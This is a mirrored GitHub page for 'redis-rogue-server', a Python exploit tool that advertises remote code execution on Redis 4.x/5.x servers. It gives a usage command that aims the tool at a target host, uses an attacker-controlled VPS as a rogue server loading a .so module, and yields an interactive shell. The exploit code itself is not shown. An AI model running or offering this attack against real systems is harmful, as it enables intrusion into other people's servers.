we08guyy / redis-rogue-server

Redis 4.x/5.x RCE refer to LC/BC.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Redis 4.x/Redis 5.x RCE EXP

tech reference: Redis post-exploitation.

test passed by Redis 5.0.9.

Prepare:

Usage:

python3 redis-rogue-server.py --rhost <target address> [--rport <target port>] --lhost <vps address> [--lport <vps port>] [--so <.so filename>] [--rpasswd <redis auth>]

Finally, you will get a interactive shell. Use exit to quit and clean rhost server or use ctrl-C to quit without clean.

About

Redis 4.x/5.x RCE refer to LC/BC.


Languages

Language:Python 100.0%